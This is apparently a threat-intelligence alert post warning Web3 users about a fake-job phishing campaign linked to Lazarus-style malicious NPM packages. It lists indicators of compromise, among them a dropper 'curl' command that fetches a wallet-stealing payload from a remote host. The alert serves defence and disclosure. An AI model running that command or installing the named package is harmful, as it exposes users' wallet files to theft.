🚨 Security TI Alert 🚨

According to community partner @1nf0s3cpt, an active phishing campaign is targeting Web3 users with fake job offers (e.g. $120/hour) to trick them into executing a malicious script that steals wallet files.

🔍 Key IOCs:

🔸GitLab repo: https://t.co/ivGN93PS4b

🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 The attack method is very similar to the previous Lazarus use of NPM packages to spread malicious code:

https://t.co/bBC4i2vYpA

🚨 We found that a new malicious NPM package was just published:

https://t.co/SjgmO1FOIL

🔸Likely linked GitHub: apollo-hero

🔸Uploader email: [email protected]

⚠️ Do NOT install or run unknown packages or scripts. Always verify sources.

#LAZARUS #Phishing